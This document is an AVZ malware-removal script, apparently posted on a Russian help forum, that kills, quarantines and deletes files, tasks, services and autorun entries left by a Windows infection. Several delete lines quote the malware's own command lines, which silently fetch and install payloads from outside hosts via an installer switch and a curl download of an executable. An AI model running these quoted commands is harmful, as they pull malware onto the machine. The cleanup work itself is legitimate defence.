Код:
begin
TerminateProcessByName('c:\program files (x86)\system native\main services\service_box.exe');
TerminateProcessByName('c:\users\78fc~1\appdata\local\temp\is-7c3nn.tmp\20gtecrhzb2.tmp');
TerminateProcessByName('c:\users\78fc~1\appdata\local\temp\is-e1296.tmp\05kwyawaabj.tmp');
TerminateProcessByName('c:\users\78fc~1\appdata\local\temp\is-qhuis.tmp\yizvnym5v02.tmp');
TerminateProcessByName('c:\users\78fc~1\appdata\local\temp\is-rcgc9.tmp\jicj3lhiwgv.tmp');
TerminateProcessByName('c:\users\78fc~1\appdata\local\temp\is-rcgca.tmp\0i43clcpjpr.tmp');
TerminateProcessByName('c:\users\78fc~1\appdata\local\temp\is-rr8s0.tmp\evudgdtas34.tmp');
TerminateProcessByName('c:\users\78fc~1\appdata\local\temp\is-vl55f.tmp\broccd22ibu.tmp');
TerminateProcessByName('c:\users\78fc~1\appdata\local\temp\is-vmfc8.tmp\25rghqooyk4.tmp');
TerminateProcessByName('C:\Users\Рома\AppData\Roaming\.tlauncher\zc92j6\keiqsseziw\z152dbjxobab41\br664cuqw2\l8b3d7angas1\cоnhоst.exe');
TerminateProcessByName('c:\users\Рома\appdata\roaming\0vjqbp1pyuv\20gtecrhzb2.exe');
TerminateProcessByName('c:\users\Рома\appdata\roaming\1rojwotdhri\yizvnym5v02.exe');
TerminateProcessByName('c:\users\Рома\appdata\roaming\bsxru1rud3x\25rghqooyk4.exe');
TerminateProcessByName('c:\users\Рома\appdata\roaming\itcr5iggqs1\0i43clcpjpr.exe');
TerminateProcessByName('c:\users\Рома\appdata\roaming\npvfho2kayi\evudgdtas34.exe');
TerminateProcessByName('c:\users\Рома\appdata\roaming\ylzuiaetcpa\jicj3lhiwgv.exe');
TerminateProcessByName('c:\users\Рома\appdata\roaming\zcqwdvmjl4n\05kwyawaabj.exe');
TerminateProcessByName('c:\users\Рома\appdata\roaming\zfypcgrhuah\broccd22ibu.exe');
StopService('service_box.exe');
QuarantineFile('C:\Log\shfhc.vbs.vbs', '');
QuarantineFile('C:\Program Files (x86)\aumuFeIYQN.exe', '');
QuarantineFile('C:\Program Files (x86)\Common Files\VUCWAABaAI.bat', '');
QuarantineFile('C:\Program Files (x86)\Common Files\WvMaOZ.bat', '');
QuarantineFile('C:\Program Files (x86)\Common Files\YyYOIeAsYIiOT.bat', '');
QuarantineFile('C:\Program Files (x86)\grZOAUwTuaI.bat', '');
QuarantineFile('C:\Program Files (x86)\System Native\Main Services\Guard.exe', '');
QuarantineFile('c:\program files (x86)\system native\main services\service_box.exe', '');
QuarantineFile('C:\Program Files (x86)\System Native\Main Services\updater.exe', '');
QuarantineFile('C:\Program Files\Video Color Mixer\Video Color Mixer.dll', '');
QuarantineFile('C:\ProgramData\AudioDriver\AudioDriver.vbs', '');
QuarantineFile('C:\ProgramData\Voyasollam\Tripplestatnix.dll', '');
QuarantineFile('C:\ProgramData\Voyasollam\Y-dax.dll', '');
QuarantineFile('C:\Users\78FC~1\AppData\Local\Temp\is-30CU8.tmp\idp.dll', '');
QuarantineFile('C:\Users\78FC~1\AppData\Local\Temp\is-5H9N0.tmp\idp.dll', '');
QuarantineFile('C:\Users\78FC~1\AppData\Local\Temp\is-6M0VM.tmp\idp.dll', '');
QuarantineFile('c:\users\78fc~1\appdata\local\temp\is-7c3nn.tmp\20gtecrhzb2.tmp', '');
QuarantineFile('C:\Users\78FC~1\AppData\Local\Temp\is-9IIBG.tmp\idp.dll', '');
QuarantineFile('C:\Users\78FC~1\AppData\Local\Temp\is-BAC89.tmp\idp.dll', '');
QuarantineFile('C:\Users\78FC~1\AppData\Local\Temp\is-DR910.tmp\idp.dll', '');
QuarantineFile('c:\users\78fc~1\appdata\local\temp\is-e1296.tmp\05kwyawaabj.tmp', '');
QuarantineFile('C:\Users\78FC~1\AppData\Local\Temp\is-PS2K6.tmp\idp.dll', '');
QuarantineFile('c:\users\78fc~1\appdata\local\temp\is-qhuis.tmp\yizvnym5v02.tmp', '');
QuarantineFile('C:\Users\78FC~1\AppData\Local\Temp\is-QJFJ0.tmp\idp.dll', '');
QuarantineFile('c:\users\78fc~1\appdata\local\temp\is-rcgc9.tmp\jicj3lhiwgv.tmp', '');
QuarantineFile('c:\users\78fc~1\appdata\local\temp\is-rcgca.tmp\0i43clcpjpr.tmp', '');
QuarantineFile('c:\users\78fc~1\appdata\local\temp\is-rr8s0.tmp\evudgdtas34.tmp', '');
QuarantineFile('c:\users\78fc~1\appdata\local\temp\is-vl55f.tmp\broccd22ibu.tmp', '');
QuarantineFile('c:\users\78fc~1\appdata\local\temp\is-vmfc8.tmp\25rghqooyk4.tmp', '');
QuarantineFile('C:\Users\78FC~1\AppData\Roaming\HTTPFI~1\app.py', '');
QuarantineFile('C:\Users\78FC~1\AppData\Roaming\HTTPFI~1\ml.py', '');
QuarantineFile('C:\Users\Рома\appdata\local\svshost\svshost.exe', '');
QuarantineFile('C:\Users\Рома\AppData\LocalLow\DuckGo\duckgo.dll', '');
QuarantineFile('C:\Users\Рома\AppData\Roaming\.tlauncher\zc92j6\keiqsseziw\z152dbjxobab41\br664cuqw2\l8b3d7angas1\cоnhоst.exe', '');
QuarantineFile('c:\users\Рома\appdata\roaming\0vjqbp1pyuv\20gtecrhzb2.exe', '');
QuarantineFile('c:\users\Рома\appdata\roaming\1rojwotdhri\yizvnym5v02.exe', '');
QuarantineFile('c:\users\Рома\appdata\roaming\bsxru1rud3x\25rghqooyk4.exe', '');
QuarantineFile('C:\Users\Рома\AppData\Roaming\curl\curl.exe', '');
QuarantineFile('C:\Users\Рома\AppData\Roaming\curl\curl_7_54.exe', '');
QuarantineFile('c:\users\Рома\appdata\roaming\itcr5iggqs1\0i43clcpjpr.exe', '');
QuarantineFile('c:\users\Рома\appdata\roaming\npvfho2kayi\evudgdtas34.exe', '');
QuarantineFile('C:\Users\Рома\AppData\Roaming\threatdatabase\tdget.exe', '');
QuarantineFile('c:\users\Рома\appdata\roaming\ylzuiaetcpa\jicj3lhiwgv.exe', '');
QuarantineFile('c:\users\Рома\appdata\roaming\zcqwdvmjl4n\05kwyawaabj.exe', '');
QuarantineFile('c:\users\Рома\appdata\roaming\zfypcgrhuah\broccd22ibu.exe', '');
QuarantineFile('C:\Users\Рома\gLEyeicrAYp.exe', '');
QuarantineFile('C:\Users\Рома\ujmpKpRUVSAyu.bat', '');
QuarantineFile('C:\Users\Рома\yfIpuyOUe.bat', '');
QuarantineFile('C:\Users\Рома\yuZuUqodSUnTh.bat', '');
QuarantineFile('C:\Windows\DeyIGAaNae.bat', '');
QuarantineFile('C:\Windows\qudVVOE.exe', '');
QuarantineFile('C:\Windows\System32\drivers\mracdrv.sys', '');
QuarantineFile('C:\Windows\System32\mracsvc.exe', '');
QuarantineFile('C:\Windows\SysWOW64\oKewYxqkAeN.bat', '');
QuarantineFile('C:\Windows\SysWOW64\TMmibIabYx.bat', '');
QuarantineFile('C:\Windows\Temp\svchost.exe', '');
QuarantineFile('C:\Windows\VueIzZ.exe', '');
DeleteFile('"C:\Users\Рома\gLEyeicrAYp.exe" /i http://leftstate.info/ybpnzoeafazb.slw /q', '32');
DeleteFile('"C:\Windows\qudVVOE.exe" /i http://powerclif.info/bwoecrxgflim.zna /q', '32');
DeleteFile('"C:\Windows\VueIzZ.exe" /i http://leftstate.info/rsugefzoqfaw.zsn /q', '32');
DeleteFile('C:\Log\shfhc.vbs.vbs', '32');
DeleteFile('C:\Program Files (x86)\aumuFeIYQN.exe', '32');
DeleteFile('C:\Program Files (x86)\Common Files\VUCWAABaAI.bat', '32');
DeleteFile('C:\Program Files (x86)\Common Files\WvMaOZ.bat', '32');
DeleteFile('C:\Program Files (x86)\Common Files\YyYOIeAsYIiOT.bat', '32');
DeleteFile('C:\Program Files (x86)\grZOAUwTuaI.bat', '32');
DeleteFile('C:\Program Files (x86)\System Native\Main Services\Guard.exe', '32');
DeleteFile('c:\program files (x86)\system native\main services\service_box.exe', '32');
DeleteFile('C:\Program Files (x86)\System Native\Main Services\updater.exe', '32');
DeleteFile('C:\Program Files\Video Color Mixer\Video Color Mixer.dll', '32');
DeleteFile('C:\ProgramData\AudioDriver\AudioDriver.vbs', '32');
DeleteFile('C:\ProgramData\Voyasollam\Tripplestatnix.dll', '32');
DeleteFile('C:\ProgramData\Voyasollam\Y-dax.dll', '32');
DeleteFile('C:\Users\78FC~1\AppData\Local\Temp\is-30CU8.tmp\idp.dll', '32');
DeleteFile('C:\Users\78FC~1\AppData\Local\Temp\is-5H9N0.tmp\idp.dll', '32');
DeleteFile('C:\Users\78FC~1\AppData\Local\Temp\is-6M0VM.tmp\idp.dll', '32');
DeleteFile('c:\users\78fc~1\appdata\local\temp\is-7c3nn.tmp\20gtecrhzb2.tmp', '32');
DeleteFile('C:\Users\78FC~1\AppData\Local\Temp\is-9IIBG.tmp\idp.dll', '32');
DeleteFile('C:\Users\78FC~1\AppData\Local\Temp\is-BAC89.tmp\idp.dll', '32');
DeleteFile('C:\Users\78FC~1\AppData\Local\Temp\is-DR910.tmp\idp.dll', '32');
DeleteFile('c:\users\78fc~1\appdata\local\temp\is-e1296.tmp\05kwyawaabj.tmp', '32');
DeleteFile('C:\Users\78FC~1\AppData\Local\Temp\is-PS2K6.tmp\idp.dll', '32');
DeleteFile('c:\users\78fc~1\appdata\local\temp\is-qhuis.tmp\yizvnym5v02.tmp', '32');
DeleteFile('C:\Users\78FC~1\AppData\Local\Temp\is-QJFJ0.tmp\idp.dll', '32');
DeleteFile('c:\users\78fc~1\appdata\local\temp\is-rcgc9.tmp\jicj3lhiwgv.tmp', '32');
DeleteFile('c:\users\78fc~1\appdata\local\temp\is-rcgca.tmp\0i43clcpjpr.tmp', '32');
DeleteFile('c:\users\78fc~1\appdata\local\temp\is-rr8s0.tmp\evudgdtas34.tmp', '32');
DeleteFile('c:\users\78fc~1\appdata\local\temp\is-vl55f.tmp\broccd22ibu.tmp', '32');
DeleteFile('c:\users\78fc~1\appdata\local\temp\is-vmfc8.tmp\25rghqooyk4.tmp', '32');
DeleteFile('C:\Users\78FC~1\AppData\Roaming\HTTPFI~1\app.py', '32');
DeleteFile('C:\Users\78FC~1\AppData\Roaming\HTTPFI~1\ml.py', '32');
DeleteFile('C:\Users\Рома\AppData\Local\Microsoft\Start Menu\Вoйти в Интeрнeт.lnk');
DeleteFile('C:\Users\Рома\appdata\local\svshost\svshost.exe', '32');
DeleteFile('C:\Users\Рома\AppData\LocalLow\DuckGo\duckgo.dll', '32');
DeleteFile('C:\Users\Рома\AppData\Roaming\.tlauncher\zc92j6\keiqsseziw\z152dbjxobab41\br664cuqw2\l8b3d7angas1\cоnhоst.exe', '32');
DeleteFile('c:\users\Рома\appdata\roaming\0vjqbp1pyuv\20gtecrhzb2.exe', '32');
DeleteFile('c:\users\Рома\appdata\roaming\1rojwotdhri\yizvnym5v02.exe', '32');
DeleteFile('c:\users\Рома\appdata\roaming\bsxru1rud3x\25rghqooyk4.exe', '32');
DeleteFile('C:\Users\Рома\AppData\Roaming\curl\curl.exe', '32');
DeleteFile('C:\Users\Рома\AppData\Roaming\curl\curl_7_54.exe -f -s -L http://eltugno.ru/f.exe -o "C:\Users\Рома\AppData\Roaming\curl\curl.exe"', '32');
DeleteFile('c:\users\Рома\appdata\roaming\itcr5iggqs1\0i43clcpjpr.exe', '32');
DeleteFile('C:\Users\Рома\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Вoйти в Интeрнeт.lnk');
DeleteFile('c:\users\Рома\appdata\roaming\npvfho2kayi\evudgdtas34.exe', '32');
DeleteFile('C:\Users\Рома\AppData\Roaming\threatdatabase\tdget.exe', '32');
DeleteFile('c:\users\Рома\appdata\roaming\ylzuiaetcpa\jicj3lhiwgv.exe', '32');
DeleteFile('c:\users\Рома\appdata\roaming\zcqwdvmjl4n\05kwyawaabj.exe', '32');
DeleteFile('c:\users\Рома\appdata\roaming\zfypcgrhuah\broccd22ibu.exe', '32');
DeleteFile('C:\Users\Рома\Favorites\Links\Интернет.url');
DeleteFile('C:\Users\Рома\ujmpKpRUVSAyu.bat', '32');
DeleteFile('C:\Users\Рома\yfIpuyOUe.bat', '32');
DeleteFile('C:\Users\Рома\yuZuUqodSUnTh.bat', '32');
DeleteFile('C:\Windows\DeyIGAaNae.bat', '32');
DeleteFile('C:\Windows\System32\drivers\mracdrv.sys', '32');
DeleteFile('C:\Windows\System32\mracsvc.exe', '32');
DeleteFile('C:\Windows\SysWOW64\oKewYxqkAeN.bat', '32');
DeleteFile('C:\Windows\SysWOW64\TMmibIabYx.bat', '32');
DeleteFile('C:\Windows\Temp\svchost.exe', '32');
DeleteFile('http:\eltugno.ru\f.exe', '32');
ExecuteFile('ipconfig.exe', '/flushdns', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "{787E0547-0D0F-0D09-0911-047D0D7A117D}" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "aAtIoYyuUmgL" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "AkIwAa" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "cJGuiuYapiA" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "dZbazOID" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "FUHuhQaCMeo" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Guard" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "hlatomernetkolc" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "HttpFilter" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "HttpFilter2" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "hxYor" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "IYWUQY" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "LievwiiYGeKEL" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\Application Experience\Threat Base Loader" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "rbEEGA" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "RiAcMwYAe" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "updater" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Video Color Mixer" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "WeHnIIUT" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "yEpXOuEyJGLu" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "YoyqQYfP" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "YYoieJ" /F', 0, 15000, true);
DeleteService('mracdrv');
DeleteService('mracsvc');
DeleteService('service_box.exe');
DeleteService('updater');
DeleteFileMask('c:\program files (x86)\system native\main services', '*', true);
DeleteFileMask('c:\program files\video color mixer', '*', true);
DeleteFileMask('c:\programdata\voyasollam', '*', true);
DeleteFileMask('c:\users\78fc~1\appdata\roaming\httpfi~1', '*', true);
DeleteFileMask('c:\users\рома\appdata\local\svshost', '*', true);
DeleteFileMask('c:\users\рома\appdata\locallow\duckgo', '*', true);
DeleteFileMask('c:\users\рома\appdata\roaming\.tlauncher', '*', true);
DeleteFileMask('c:\users\рома\appdata\roaming\bsxru1rud3x', '*', true);
DeleteFileMask('c:\users\рома\appdata\roaming\curl', '*', true);
DeleteFileMask('c:\users\рома\appdata\roaming\itcr5iggqs1', '*', true);
DeleteFileMask('c:\users\рома\appdata\roaming\threatdatabase', '*', true);
DeleteFileMask('c:\users\рома\appdata\roaming\zcqwdvmjl4n', '*', true);
DeleteFileMask('c:\users\рома\appdata\roaming\zfypcgrhuah', '*', true);
DeleteDirectory('c:\program files (x86)\system native\main services');
DeleteDirectory('c:\program files\video color mixer');
DeleteDirectory('c:\programdata\voyasollam');
DeleteDirectory('c:\users\78fc~1\appdata\roaming\httpfi~1');
DeleteDirectory('c:\users\рома\appdata\local\svshost');
DeleteDirectory('c:\users\рома\appdata\locallow\duckgo');
DeleteDirectory('c:\users\рома\appdata\roaming\.tlauncher');
DeleteDirectory('c:\users\рома\appdata\roaming\bsxru1rud3x');
DeleteDirectory('c:\users\рома\appdata\roaming\curl');
DeleteDirectory('c:\users\рома\appdata\roaming\itcr5iggqs1');
DeleteDirectory('c:\users\рома\appdata\roaming\threatdatabase');
DeleteDirectory('c:\users\рома\appdata\roaming\zcqwdvmjl4n');
DeleteDirectory('c:\users\рома\appdata\roaming\zfypcgrhuah');
DelBHO('{96AF5545-BC30-4E5D-8E36-836D000A1455}');
DelBHO('{E4625B55-9401-4B40-B5BA-9134A41BFAA0}');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', '1138028');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', '169222');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', '2432004');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', '2805680');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', '3589852');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', '3632956');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', '6384266');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', '8965939');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'HttpFilter');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'pebpbmwvkj');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'wo6zscqnbl3x9');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteRepair(4);
ExecuteRepair(21);
ExecuteWizard('SCU', 2, 2, true);
RebootWindows(true);
end.
Компьютер перезагрузится.